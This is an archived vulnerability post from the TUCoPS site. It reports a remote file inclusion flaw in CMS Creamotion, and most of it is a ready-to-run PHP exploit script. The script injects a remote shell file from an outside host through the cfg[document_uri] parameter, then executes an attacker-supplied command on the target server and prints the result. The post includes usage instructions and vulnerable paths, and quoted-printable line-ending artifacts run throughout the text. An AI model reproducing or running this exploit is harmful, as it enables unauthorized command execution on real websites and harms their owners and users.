Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb12850.htm

CMS Creamotion - Remote File inclusion



CMS Creamotion - Remote File inclusion
CMS Creamotion - Remote File inclusion



Hello,,=0D
=0D
CMS Creamotion - Remote File include=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
Remote File including :=0D
=0D
/_administration/securite.php?cfg[document_uri]=[Shell_DIR]=0D
=0D
/_administration/gestion_configurations/save_config.php?cfg[document_uri]=[Shell_DIR]=0D
=0D
=0D
Exploit : =0D
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
print_r('=0D
/**********************************************/=0D
/*     CMS Creamotion Command Execution       */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<3) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host=0D
/* Example:                                   */=0D
/* php '.$argv[0].' http://localhost/ id=0D 
/**********************************************/=0D
');=0D
die;=0D
}=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
=0D
$url=$argv[1];=0D
$cmd=$argv[2];=0D
$exploit="/_administration/securite.php?cfg[document_uri]=http://members.lycos.co.uk/soqor10/cmd.txt?";=0D 
$page=$url.$exploit;=0D
=0D
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
     $npage    = get_page($page);=0D
=0D
=0D
     if(eregi("Cannot execute a blank command",$npage))=0D
     {=0D
             $pagecmd=$page."&cmd=$cmd";=0D
Die("\n[+] Exploit Is Working\n[+] Result For CMD : ".get_page($pagecmd)."\n[+] See The Vulnerabiliy article for more informations\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
             }=0D
             Else=0D
             {=0D
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
                }=0D
#WwW.SoQoR.NeT=0D 
?>=0D
=0D
WwW.SoQoR.NeT 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH